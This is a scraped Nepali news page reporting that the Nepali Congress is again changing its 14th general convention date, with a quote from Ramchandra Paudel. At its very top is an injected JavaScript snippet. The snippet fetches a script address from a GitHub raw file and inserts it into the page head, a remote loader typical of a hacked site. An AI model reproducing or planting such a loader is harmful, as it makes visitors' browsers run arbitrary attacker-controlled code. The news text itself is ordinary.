;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काँग्रेसको महाधिवेशन मिति फेरि परिवर्तन – जुनेली न्युज
सोमवार, बैशाख ९, २०८२
  • होमपेज
  • काँग्रेसको महाधिवेशन मिति फेरि परिवर्तन
Breaking News

काँग्रेसको महाधिवेशन मिति फेरि परिवर्तन

जुनेली न्युज काठमाडौँ । नेपाली कांग्रेसको १४ औं महाधिवेशनको मिति फेरि परिवर्तन हुने भएको छ । सिंहदरबारमा बुधबार बसेको पदाधिकारी बैठकले यस्तो सहमति जुटाएको हो ।

बैठकपछि वरिष्ठ नेता रामचन्द्र पौडेलले भने, ‘दसैं अगाडि पालिका तहको अधिवेशनमात्रै सम्पन्न हुने गरी कार्यतालिका फेरबदल हुने सहमति भएको छ ।’

फेसबुक प्रतिक्रियाहरु